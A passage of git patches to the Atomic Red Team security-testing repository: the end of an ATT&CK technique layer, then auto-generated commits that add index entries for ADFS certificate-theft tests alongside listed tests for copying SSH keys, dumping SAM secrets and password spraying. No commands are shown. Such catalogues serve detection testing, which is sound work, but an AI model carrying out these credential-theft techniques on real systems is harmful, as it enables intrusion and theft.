/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file

From c7ff36af56e45423e304864718dc6282d8db2de5 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Thu, 19 Aug 2021 15:03:43 +0000
Subject: [PATCH 30/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index a8291305..b3f3a3cb 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -764,3 +764,5 @@ eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 aa6cb8c4-b582-4f8e-b677-37733914abda
 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
 615bd568-2859-41b5-9aed-61f6a88e48dd
+78e95057-d429-4e66-8f82-0f060c1ac96f
+cab413d8-9e4a-4b8d-9b84-c985bd73a442

From f72d8699bf6c963c29b0ec961d6dc76ea3a9f9a1 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 19 Aug 2021 15:03:48 +0000
Subject: [PATCH 31/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |   2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |   2 +
 atomics/Indexes/Indexes-Markdown/index.md     |   2 +
 .../Indexes/Indexes-Markdown/windows-index.md |   2 +
 atomics/Indexes/index.yaml                    |  93 ++++++++++++
 atomics/T1552.004/T1552.004.md                | 137 ++++++++++++++++++
 6 files changed, 238 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 85b3626e..fd3686a6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -71,6 +71,8 @@ credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-90
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
+credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
+credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 50d5465f..c02a3d0f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -49,6 +49,8 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
+credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
+credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index df1ee3c0..a61424e2 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -114,6 +114,8 @@
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
   - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
+  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
+  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 3b558504..61d8b1ed 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -85,6 +85,8 @@
